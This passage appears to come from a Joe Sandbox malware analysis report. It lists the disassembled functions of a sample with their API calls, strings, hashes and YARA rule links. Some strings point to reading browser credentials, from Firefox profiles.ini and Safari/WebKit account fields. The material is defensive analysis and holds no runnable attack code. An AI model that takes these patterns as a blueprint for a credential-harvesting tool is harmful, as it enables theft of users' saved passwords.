                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID:
                                                              • API String ID: 2081463915-0
                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                              Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                              Non-executed Functions

                                                              Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • free.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                              Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 577499730-1134094380
                                                              • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              • {Unknown}, xrefs: 004132A6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
